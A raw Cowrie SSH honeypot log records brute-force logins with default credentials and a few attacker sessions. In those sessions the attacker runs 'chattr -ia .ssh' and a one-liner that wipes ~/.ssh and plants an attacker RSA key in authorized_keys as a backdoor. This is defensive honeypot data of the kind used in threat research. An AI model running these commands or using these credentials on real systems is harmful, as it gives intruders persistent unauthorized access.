{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59246,"dst_ip":"1.2.3.4","dst_port":22,"session":"368fe1bff1da","protocol":"ssh","message":"New connection: 212.227.125.160:59246 (1.2.3.4:22) [session: 368fe1bff1da]","sensor":"my-vps","timestamp":"2025-08-31T00:57:22.063194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:57:22.064186Z","src_ip":"212.227.125.160","session":"368fe1bff1da"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:57:22.137154Z","src_ip":"212.227.125.160","session":"368fe1bff1da"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-31T00:57:22.358954Z","src_ip":"212.227.125.160","session":"368fe1bff1da"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:23.504101Z","src_ip":"212.227.125.160","session":"368fe1bff1da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46646,"dst_ip":"1.2.3.4","dst_port":22,"session":"95a1ace32d69","protocol":"ssh","message":"New connection: 212.227.125.160:46646 (1.2.3.4:22) [session: 95a1ace32d69]","sensor":"my-vps","timestamp":"2025-08-31T00:57:32.470359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:57:32.471473Z","src_ip":"212.227.125.160","session":"95a1ace32d69"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:57:32.545911Z","src_ip":"212.227.125.160","session":"95a1ace32d69"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-31T00:57:32.780311Z","src_ip":"212.227.125.160","session":"95a1ace32d69"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:32.947492Z","src_ip":"212.227.125.160","session":"252a21f15c9b"}
{"eventid":"cowrie.session.closed","duration":180.10441040992737,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:32.951206Z","src_ip":"212.227.125.160","session":"252a21f15c9b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:33.927662Z","src_ip":"212.227.125.160","session":"95a1ace32d69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57948,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dd10b45b261","protocol":"ssh","message":"New connection: 212.227.235.229:57948 (1.2.3.4:22) [session: 4dd10b45b261]","sensor":"my-vps","timestamp":"2025-08-31T00:57:35.015359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:57:35.884778Z","src_ip":"212.227.235.229","session":"4dd10b45b261"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:57:35.885663Z","src_ip":"212.227.235.229","session":"4dd10b45b261"}
{"eventid":"cowrie.login.failed","username":"debian","password":"1234567","message":"login attempt [debian/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T00:57:41.898616Z","src_ip":"212.227.235.229","session":"4dd10b45b261"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49768,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae708eb8775c","protocol":"ssh","message":"New connection: 212.227.125.160:49768 (1.2.3.4:22) [session: ae708eb8775c]","sensor":"my-vps","timestamp":"2025-08-31T00:57:42.874639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:57:42.876095Z","src_ip":"212.227.125.160","session":"ae708eb8775c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:57:42.949376Z","src_ip":"212.227.125.160","session":"ae708eb8775c"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:57:43.190517Z","src_ip":"212.227.125.160","session":"ae708eb8775c"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:43.649960Z","src_ip":"212.227.235.229","session":"4dd10b45b261"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:44.367542Z","src_ip":"212.227.125.160","session":"ae708eb8775c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56992,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee55626c53a0","protocol":"ssh","message":"New connection: 212.227.235.229:56992 (1.2.3.4:22) [session: ee55626c53a0]","sensor":"my-vps","timestamp":"2025-08-31T00:57:45.377073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:57:45.377967Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:57:45.444918Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.login.success","username":"root","password":"dell@2023","message":"login attempt [root/dell@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:57:45.755922Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:57:45.904948Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:57:45.905636Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:57:45.906892Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:45.975081Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:57:46.605645Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:57:46.606386Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:57:46.675439Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:46.676442Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57632,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cd7165fcd19","protocol":"ssh","message":"New connection: 212.227.235.229:57632 (1.2.3.4:22) [session: 5cd7165fcd19]","sensor":"my-vps","timestamp":"2025-08-31T00:57:46.742393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:57:46.743186Z","src_ip":"212.227.235.229","session":"5cd7165fcd19"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:57:46.811783Z","src_ip":"212.227.235.229","session":"5cd7165fcd19"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:57:47.125955Z","src_ip":"212.227.235.229","session":"5cd7165fcd19"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:48.195471Z","src_ip":"212.227.235.229","session":"5cd7165fcd19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58406,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ce1e9529204","protocol":"ssh","message":"New connection: 212.227.235.229:58406 (1.2.3.4:22) [session: 3ce1e9529204]","sensor":"my-vps","timestamp":"2025-08-31T00:57:48.261660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:57:48.262564Z","src_ip":"212.227.235.229","session":"3ce1e9529204"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:57:48.330272Z","src_ip":"212.227.235.229","session":"3ce1e9529204"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:57:48.638324Z","src_ip":"212.227.235.229","session":"3ce1e9529204"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:48.707454Z","src_ip":"212.227.235.229","session":"ee55626c53a0"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:48.709203Z","src_ip":"212.227.235.229","session":"3ce1e9529204"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60050,"dst_ip":"1.2.3.4","dst_port":22,"session":"170e50835bdd","protocol":"ssh","message":"New connection: 212.227.235.229:60050 (1.2.3.4:22) [session: 170e50835bdd]","sensor":"my-vps","timestamp":"2025-08-31T00:57:49.528212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:57:49.531303Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:57:49.769465Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
{"eventid":"cowrie.login.success","username":"root","password":"n960..123","message":"login attempt [root/n960..123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:57:50.718269Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:57:51.221352Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:57:51.222051Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:57:51.222989Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:51.459344Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
